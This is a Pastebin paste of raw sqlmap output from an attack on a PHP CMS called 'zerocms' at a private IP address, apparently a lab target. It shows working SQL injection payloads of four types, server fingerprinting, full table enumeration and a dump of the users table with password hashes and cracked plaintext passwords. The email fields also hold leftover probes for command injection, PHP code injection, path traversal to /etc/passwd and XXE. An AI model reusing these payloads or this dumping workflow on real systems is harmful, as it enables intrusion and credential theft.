API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Aug 7th, 2015
425
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 66.52 KB | None | 0 0
raw download clone embed print report
  1. sqlmap identified the following injection points with a total of 58 HTTP(s) requests:
  2. ---
  3. Parameter: #1* (URI)
  4. Type: boolean-based blind
  5. Title: AND boolean-based blind - WHERE or HAVING clause
  6. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND 8917=8917
  7.  
  8. Type: error-based
  9. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  10. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT 8377 FROM(SELECT COUNT(*),CONCAT(0x717a707871,(SELECT (CASE WHEN (8377=8377) THEN 1 ELSE 0 END)),0x71626a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  11.  
  12. Type: UNION query
  13. Title: MySQL UNION query (NULL) - 6 columns
  14. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=-5238 UNION ALL SELECT CONCAT(0x717a707871,0x6b536c61616d42486a73,0x71626a6271),NULL,NULL,NULL,NULL,NULL#
  15.  
  16. Type: AND/OR time-based blind
  17. Title: MySQL > 5.0.11 AND time-based blind (SELECT)
  18. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))QOUU)
  19. ---
  20. web server operating system: Linux Debian 7.0 (wheezy)
  21. web application technology: Apache 2.2.22, PHP 5.4.4
  22. back-end DBMS: active fingerprint: MySQL >= 5.5.0
  23. html error message fingerprint: MySQL
  24. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  25. ---
  26. Parameter: #1* (URI)
  27. Type: boolean-based blind
  28. Title: AND boolean-based blind - WHERE or HAVING clause
  29. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND 8917=8917
  30.  
  31. Type: error-based
  32. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  33. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT 8377 FROM(SELECT COUNT(*),CONCAT(0x717a707871,(SELECT (CASE WHEN (8377=8377) THEN 1 ELSE 0 END)),0x71626a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  34.  
  35. Type: UNION query
  36. Title: MySQL UNION query (NULL) - 6 columns
  37. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=-5238 UNION ALL SELECT CONCAT(0x717a707871,0x6b536c61616d42486a73,0x71626a6271),NULL,NULL,NULL,NULL,NULL#
  38.  
  39. Type: AND/OR time-based blind
  40. Title: MySQL > 5.0.11 AND time-based blind (SELECT)
  41. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))QOUU)
  42. ---
  43. web server operating system: Linux Debian 7.0 (wheezy)
  44. web application technology: Apache 2.2.22, PHP 5.4.4
  45. back-end DBMS: MySQL 5
  46. current database: 'zerocms'
  47. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  48. ---
  49. Parameter: #1* (URI)
  50. Type: boolean-based blind
  51. Title: AND boolean-based blind - WHERE or HAVING clause
  52. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND 8917=8917
  53.  
  54. Type: error-based
  55. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  56. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT 8377 FROM(SELECT COUNT(*),CONCAT(0x717a707871,(SELECT (CASE WHEN (8377=8377) THEN 1 ELSE 0 END)),0x71626a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  57.  
  58. Type: UNION query
  59. Title: MySQL UNION query (NULL) - 6 columns
  60. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=-5238 UNION ALL SELECT CONCAT(0x717a707871,0x6b536c61616d42486a73,0x71626a6271),NULL,NULL,NULL,NULL,NULL#
  61.  
  62. Type: AND/OR time-based blind
  63. Title: MySQL > 5.0.11 AND time-based blind (SELECT)
  64. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))QOUU)
  65. ---
  66. web server operating system: Linux Debian 7.0 (wheezy)
  67. web application technology: Apache 2.2.22, PHP 5.4.4
  68. back-end DBMS: MySQL 5
  69. Database: zerocms
  70. [4 tables]
  71. +--------------------+
  72. | zero_access_levels |
  73. | zero_articles |
  74. | zero_comments |
  75. | zero_users |
  76. +--------------------+
  77.  
  78. Database: zerocms
  79. Table: zero_articles
  80. [7 columns]
  81. +--------------+------------------+
  82. | Column | Type |
  83. +--------------+------------------+
  84. | article_id | int(10) unsigned |
  85. | article_text | mediumtext |
  86. | is_published | tinyint(1) |
  87. | publish_date | datetime |
  88. | submit_date | datetime |
  89. | title | varchar(255) |
  90. | user_id | int(10) unsigned |
  91. +--------------+------------------+
  92.  
  93. Database: zerocms
  94. Table: zero_access_levels
  95. [2 columns]
  96. +--------------+---------------------+
  97. | Column | Type |
  98. +--------------+---------------------+
  99. | access_level | tinyint(3) unsigned |
  100. | access_name | varchar(50) |
  101. +--------------+---------------------+
  102.  
  103. Database: zerocms
  104. Table: zero_comments
  105. [5 columns]
  106. +--------------+------------------+
  107. | Column | Type |
  108. +--------------+------------------+
  109. | article_id | int(10) unsigned |
  110. | comment_date | datetime |
  111. | comment_id | int(10) unsigned |
  112. | comment_text | mediumtext |
  113. | user_id | int(10) unsigned |
  114. +--------------+------------------+
  115.  
  116. Database: zerocms
  117. Table: zero_users
  118. [5 columns]
  119. +--------------+---------------------+
  120. | Column | Type |
  121. +--------------+---------------------+
  122. | access_level | tinyint(3) unsigned |
  123. | email | varchar(100) |
  124. | name | varchar(100) |
  125. | password | char(41) |
  126. | user_id | int(10) unsigned |
  127. +--------------+---------------------+
  128.  
  129. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  130. ---
  131. Parameter: #1* (URI)
  132. Type: boolean-based blind
  133. Title: AND boolean-based blind - WHERE or HAVING clause
  134. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND 8917=8917
  135.  
  136. Type: error-based
  137. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  138. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT 8377 FROM(SELECT COUNT(*),CONCAT(0x717a707871,(SELECT (CASE WHEN (8377=8377) THEN 1 ELSE 0 END)),0x71626a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  139.  
  140. Type: UNION query
  141. Title: MySQL UNION query (NULL) - 6 columns
  142. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=-5238 UNION ALL SELECT CONCAT(0x717a707871,0x6b536c61616d42486a73,0x71626a6271),NULL,NULL,NULL,NULL,NULL#
  143.  
  144. Type: AND/OR time-based blind
  145. Title: MySQL > 5.0.11 AND time-based blind (SELECT)
  146. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))QOUU)
  147. ---
  148. web server operating system: Linux Debian 7.0 (wheezy)
  149. web application technology: Apache 2.2.22, PHP 5.4.4
  150. back-end DBMS: MySQL 5
  151. Database: zerocms
  152. [4 tables]
  153. +--------------------+
  154. | zero_access_levels |
  155. | zero_articles |
  156. | zero_comments |
  157. | zero_users |
  158. +--------------------+
  159.  
  160. Database: zerocms
  161. Table: zero_articles
  162. [7 columns]
  163. +--------------+------------------+
  164. | Column | Type |
  165. +--------------+------------------+
  166. | article_id | int(10) unsigned |
  167. | article_text | mediumtext |
  168. | is_published | tinyint(1) |
  169. | publish_date | datetime |
  170. | submit_date | datetime |
  171. | title | varchar(255) |
  172. | user_id | int(10) unsigned |
  173. +--------------+------------------+
  174.  
  175. Database: zerocms
  176. Table: zero_access_levels
  177. [2 columns]
  178. +--------------+---------------------+
  179. | Column | Type |
  180. +--------------+---------------------+
  181. | access_level | tinyint(3) unsigned |
  182. | access_name | varchar(50) |
  183. +--------------+---------------------+
  184.  
  185. Database: zerocms
  186. Table: zero_comments
  187. [5 columns]
  188. +--------------+------------------+
  189. | Column | Type |
  190. +--------------+------------------+
  191. | article_id | int(10) unsigned |
  192. | comment_date | datetime |
  193. | comment_id | int(10) unsigned |
  194. | comment_text | mediumtext |
  195. | user_id | int(10) unsigned |
  196. +--------------+------------------+
  197.  
  198. Database: zerocms
  199. Table: zero_users
  200. [5 columns]
  201. +--------------+---------------------+
  202. | Column | Type |
  203. +--------------+---------------------+
  204. | access_level | tinyint(3) unsigned |
  205. | email | varchar(100) |
  206. | name | varchar(100) |
  207. | password | char(41) |
  208. | user_id | int(10) unsigned |
  209. +--------------+---------------------+
  210.  
  211. Database: zerocms
  212. Table: zero_access_levels
  213. [3 entries]
  214. +---------------+--------------+
  215. | access_name | access_level |
  216. +---------------+--------------+
  217. | User | 1 |
  218. | Moderator | 2 |
  219. | Administrator | 3 |
  220. +---------------+--------------+
  221.  
  222. Database: zerocms
  223. Table: zero_articles
  224. [1 entry]
  225. +---------+------------+---------+---------------------+---------------------+--------------+--------------+
  226. | user_id | article_id | title | submit_date | publish_date | article_text | is_published |
  227. +---------+------------+---------+---------------------+---------------------+--------------+--------------+
  228. | 1 | 1 | testing | 2014-07-07 17:48:27 | 2014-07-07 17:49:05 | 123... | 1 |
  229. +---------+------------+---------+---------------------+---------------------+--------------+--------------+
  230.  
  231. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  232. ---
  233. Parameter: #1* (URI)
  234. Type: boolean-based blind
  235. Title: AND boolean-based blind - WHERE or HAVING clause
  236. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND 8917=8917
  237.  
  238. Type: error-based
  239. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  240. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT 8377 FROM(SELECT COUNT(*),CONCAT(0x717a707871,(SELECT (CASE WHEN (8377=8377) THEN 1 ELSE 0 END)),0x71626a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  241.  
  242. Type: UNION query
  243. Title: MySQL UNION query (NULL) - 6 columns
  244. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=-5238 UNION ALL SELECT CONCAT(0x717a707871,0x6b536c61616d42486a73,0x71626a6271),NULL,NULL,NULL,NULL,NULL#
  245.  
  246. Type: AND/OR time-based blind
  247. Title: MySQL > 5.0.11 AND time-based blind (SELECT)
  248. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))QOUU)
  249. ---
  250. web server operating system: Linux Debian 7.0 (wheezy)
  251. web application technology: Apache 2.2.22, PHP 5.4.4
  252. back-end DBMS: MySQL 5
  253. Database: zerocms
  254. [4 tables]
  255. +--------------------+
  256. | zero_access_levels |
  257. | zero_articles |
  258. | zero_comments |
  259. | zero_users |
  260. +--------------------+
  261.  
  262. Database: zerocms
  263. Table: zero_articles
  264. [7 columns]
  265. +--------------+------------------+
  266. | Column | Type |
  267. +--------------+------------------+
  268. | article_id | int(10) unsigned |
  269. | article_text | mediumtext |
  270. | is_published | tinyint(1) |
  271. | publish_date | datetime |
  272. | submit_date | datetime |
  273. | title | varchar(255) |
  274. | user_id | int(10) unsigned |
  275. +--------------+------------------+
  276.  
  277. Database: zerocms
  278. Table: zero_access_levels
  279. [2 columns]
  280. +--------------+---------------------+
  281. | Column | Type |
  282. +--------------+---------------------+
  283. | access_level | tinyint(3) unsigned |
  284. | access_name | varchar(50) |
  285. +--------------+---------------------+
  286.  
  287. Database: zerocms
  288. Table: zero_comments
  289. [5 columns]
  290. +--------------+------------------+
  291. | Column | Type |
  292. +--------------+------------------+
  293. | article_id | int(10) unsigned |
  294. | comment_date | datetime |
  295. | comment_id | int(10) unsigned |
  296. | comment_text | mediumtext |
  297. | user_id | int(10) unsigned |
  298. +--------------+------------------+
  299.  
  300. Database: zerocms
  301. Table: zero_users
  302. [5 columns]
  303. +--------------+---------------------+
  304. | Column | Type |
  305. +--------------+---------------------+
  306. | access_level | tinyint(3) unsigned |
  307. | email | varchar(100) |
  308. | name | varchar(100) |
  309. | password | char(41) |
  310. | user_id | int(10) unsigned |
  311. +--------------+---------------------+
  312.  
  313. Database: zerocms
  314. Table: zero_access_levels
  315. [3 entries]
  316. +---------------+--------------+
  317. | access_name | access_level |
  318. +---------------+--------------+
  319. | User | 1 |
  320. | Moderator | 2 |
  321. | Administrator | 3 |
  322. +---------------+--------------+
  323.  
  324. Database: zerocms
  325. Table: zero_articles
  326. [1 entry]
  327. +---------+------------+---------+---------------------+---------------------+--------------+--------------+
  328. | user_id | article_id | title | submit_date | publish_date | article_text | is_published |
  329. +---------+------------+---------+---------------------+---------------------+--------------+--------------+
  330. | 1 | 1 | testing | 2014-07-07 17:48:27 | 2014-07-07 17:49:05 | 123... | 1 |
  331. +---------+------------+---------+---------------------+---------------------+--------------+--------------+
  332.  
  333. Database: zerocms
  334. Table: zero_comments
  335. [0 entries]
  336. +---------+------------+------------+--------------+--------------+
  337. | user_id | comment_id | article_id | comment_date | comment_text |
  338. +---------+------------+------------+--------------+--------------+
  339. +---------+------------+------------+--------------+--------------+
  340.  
  341. Database: zerocms
  342. Table: zero_users
  343. [80 entries]
  344. +---------+---------------+------------------------------------------------------------------------------------------------------+------------------------------------------------------+--------------+
  345. | user_id | name | email | password | access_level |
  346. +---------+---------------+------------------------------------------------------------------------------------------------------+------------------------------------------------------+--------------+
  347. | 1 | Administrator | admin@domain.com | *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19 (password) | 3 |
  348. | 2 | test | test@example.com | *4AD47E08DAE2BD4F0977EED5D23DC901359DF617 (abcd1234) | 1 |
  349. | 3 | anarky | anarky@ | *23AE809DDACAF96AF0FD78ED04B6A265E05AA257 (123) | 1 |
  350. | 4 | default | default | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  351. | 5 | default | ;env | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  352. | 6 | default | a;env | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  353. | 7 | default | a);env | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  354. | 8 | default | default;env | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  355. | 9 | default | default\nenv | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  356. | 10 | default | /e\x00 | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  357. | 11 | default | a;exit(base64_decode('dzRwMXQxX2V2YWw='));// | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  358. | 12 | default | a;exit(base64_decode('dzRwMXQxX2V2YWw='));# | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  359. | 13 | default | ";exit(base64_decode('dzRwMXQxX2V2YWw='));// | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  360. | 14 | default | ";exit(base64_decode('dzRwMXQxX2V2YWw='));# | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  361. | 15 | default | ';exit(base64_decode('dzRwMXQxX2V2YWw='));// | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  362. | 16 | default | ';exit(base64_decode('dzRwMXQxX2V2YWw='));# | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  363. | 17 | default | ".exit(base64_decode('dzRwMXQxX2V2YWw='));// | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  364. | 18 | default | ".exit(base64_decode('dzRwMXQxX2V2YWw='));# | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  365. | 19 | default | '.exit(base64_decode('dzRwMXQxX2V2YWw='));// | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  366. | 20 | default | '.exit(base64_decode('dzRwMXQxX2V2YWw='));# | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  367. | 21 | default | exit(base64_decode('dzRwMXQxX2V2YWw='));// | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  368. | 22 | default | exit(base64_decode('dzRwMXQxX2V2YWw='));# | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  369. | 23 | default | a`)` | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  370. | 24 | default | a`sleep 600` | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  371. | 25 | default | http://www.google.fr/? | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  372. | 26 | default | /etc/passwd | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  373. | 27 | default | /etc/passwd\x00 | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  374. | 28 | default | c:\\\\boot.ini | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  375. | 29 | default | c:\\\\boot.ini\x00 | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  376. | 30 | default | ../../../../../../../../../../etc/passwd | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  377. | 31 | default | ../../../../../../../../../../../../../../../../../../../../etc/passwd | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  378. | 32 | default | ../../../../../../../../../../etc/passwd\x00 | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  379. | 33 | default | ../../../../../../../../../../../../../../../../../../../../etc/passwd\x00 | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  380. | 34 | default | ../../../../../../../../../../boot.ini | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  381. | 35 | default | ../../../../../../../../../../../../../../../../../../../../boot.ini | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  382. | 36 | default | ../../../../../../../../../../boot.ini\x00 | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  383. | 37 | default | ../../../../../../../../../../../../../../../../../../../../boot.ini\x00 | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  384. | 38 | default | default/../../../../../../../../../../etc/passwd | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  385. | 39 | default | default/../../../../../../../../../../../../../../../../../../../../etc/passwd | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  386. | 40 | default | default/../../../../../../../../../../etc/passwd\x00 | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  387. | 41 | default | default/../../../../../../../../../../../../../../../../../../../../etc/passwd\x00 | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  388. | 42 | default | default/../../../../../../../../../../boot.ini | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  389. | 43 | default | default/../../../../../../../../../../../../../../../../../../../../boot.ini | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  390. | 44 | default | default/../../../../../../../../../../boot.ini\x00 | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  391. | 45 | default | default/../../../../../../../../../../../../../../../../../../../../boot.ini\x00 | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  392. | 46 | default | /etc/passwd\x00index.htm | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  393. | 47 | default | /etc/passwd\x00index.html | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  394. | 48 | default | /etc/passwd\x00index.php | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  395. | 49 | default | /etc/passwd\x00index.asp | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  396. | 50 | default | /etc/passwd\x00index.aspx | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  397. | 51 | default | /etc/passwd\x00index.css | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  398. | 52 | default | c:\\\\boot.ini\x00index.htm | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  399. | 53 | default | c:\\\\boot.ini\x00index.html | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  400. | 54 | default | c:\\\\boot.ini\x00index.php | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  401. | 55 | default | c:\\\\boot.ini\x00index.asp | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  402. | 56 | default | c:\\\\boot.ini\x00index.aspx | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  403. | 57 | default | c:\\\\boot.ini\x00index.css | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  404. | 58 | default | ../../../../../../../../../../etc/passwd\x00index.htm | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  405. | 59 | default | ../../../../../../../../../../etc/passwd\x00index.html | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  406. | 60 | default | ../../../../../../../../../../etc/passwd\x00index.php | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  407. | 61 | default | ../../../../../../../../../../etc/passwd\x00index.asp | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  408. | 62 | default | ../../../../../../../../../../etc/passwd\x00index.aspx | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  409. | 63 | default | ../../../../../../../../../../etc/passwd\x00index.css | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  410. | 64 | default | ../../../../../../../../../../etc/passwd\x00pix.gif | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  411. | 65 | default | ../../../../../../../../../../boot.ini\x00index.htm | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  412. | 66 | default | ../../../../../../../../../../boot.ini\x00index.html | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  413. | 67 | default | ../../../../../../../../../../boot.ini\x00index.php | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  414. | 68 | default | ../../../../../../../../../../boot.ini\x00index.asp | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  415. | 69 | default | ../../../../../../../../../../boot.ini\x00index.aspx | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  416. | 70 | default | ../../../../../../../../../../boot.ini\x00index.css | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  417. | 71 | default | ../../../../../../../../../../boot.ini\x00pix.gix | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  418. | 72 | default | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo[<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  419. | 73 | default | .depdb | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  420. | 74 | default | .depdb\x00 | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  421. | 75 | default | pearcmd.php | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  422. | 76 | default | pearcmd.php\x00 | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  423. | 77 | default | zero_transact_user.php | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  424. | 78 | default | zero_transact_user.php\x00 | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  425. | 79 | default | <blank> | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  426. | 80 | default | wgu1d3jvs4 | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) | 1 |
  427. +---------+---------------+------------------------------------------------------------------------------------------------------+------------------------------------------------------+--------------+
  428.  
  429. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  430. ---
  431. Parameter: #1* (URI)
  432. Type: boolean-based blind
  433. Title: AND boolean-based blind - WHERE or HAVING clause
  434. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND 8917=8917
  435.  
  436. Type: error-based
  437. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  438. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT 8377 FROM(SELECT COUNT(*),CONCAT(0x717a707871,(SELECT (CASE WHEN (8377=8377) THEN 1 ELSE 0 END)),0x71626a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  439.  
  440. Type: UNION query
  441. Title: MySQL UNION query (NULL) - 6 columns
  442. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=-5238 UNION ALL SELECT CONCAT(0x717a707871,0x6b536c61616d42486a73,0x71626a6271),NULL,NULL,NULL,NULL,NULL#
  443.  
  444. Type: AND/OR time-based blind
  445. Title: MySQL > 5.0.11 AND time-based blind (SELECT)
  446. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))QOUU)
  447. ---
  448. web server operating system: Linux Debian 7.0 (wheezy)
  449. web application technology: Apache 2.2.22, PHP 5.4.4
  450. back-end DBMS: MySQL 5
  451. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  452. ---
  453. Parameter: #1* (URI)
  454. Type: boolean-based blind
  455. Title: AND boolean-based blind - WHERE or HAVING clause
  456. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND 8917=8917
  457.  
  458. Type: error-based
  459. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  460. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT 8377 FROM(SELECT COUNT(*),CONCAT(0x717a707871,(SELECT (CASE WHEN (8377=8377) THEN 1 ELSE 0 END)),0x71626a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  461.  
  462. Type: UNION query
  463. Title: MySQL UNION query (NULL) - 6 columns
  464. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=-5238 UNION ALL SELECT CONCAT(0x717a707871,0x6b536c61616d42486a73,0x71626a6271),NULL,NULL,NULL,NULL,NULL#
  465.  
  466. Type: AND/OR time-based blind
  467. Title: MySQL > 5.0.11 AND time-based blind (SELECT)
  468. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))QOUU)
  469. ---
  470. web server operating system: Linux Debian 7.0 (wheezy)
  471. web application technology: Apache 2.2.22, PHP 5.4.4
  472. back-end DBMS: MySQL 5
  473. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  474. ---
  475. Parameter: #1* (URI)
  476. Type: boolean-based blind
  477. Title: AND boolean-based blind - WHERE or HAVING clause
  478. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND 8917=8917
  479.  
  480. Type: error-based
  481. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  482. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT 8377 FROM(SELECT COUNT(*),CONCAT(0x717a707871,(SELECT (CASE WHEN (8377=8377) THEN 1 ELSE 0 END)),0x71626a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  483.  
  484. Type: UNION query
  485. Title: MySQL UNION query (NULL) - 6 columns
  486. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=-5238 UNION ALL SELECT CONCAT(0x717a707871,0x6b536c61616d42486a73,0x71626a6271),NULL,NULL,NULL,NULL,NULL#
  487.  
  488. Type: AND/OR time-based blind
  489. Title: MySQL > 5.0.11 AND time-based blind (SELECT)
  490. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))QOUU)
  491. ---
  492. web server operating system: Linux Debian 7.0 (wheezy)
  493. web application technology: Apache 2.2.22, PHP 5.4.4
  494. back-end DBMS: MySQL 5
  495. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  496. ---
  497. Parameter: #1* (URI)
  498. Type: boolean-based blind
  499. Title: AND boolean-based blind - WHERE or HAVING clause
  500. Payload: http://10.100.101.130:80/zero_view_article.php?article_id=1 AND 8917=8917
  501.  
  502. Type: error-based
  503. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
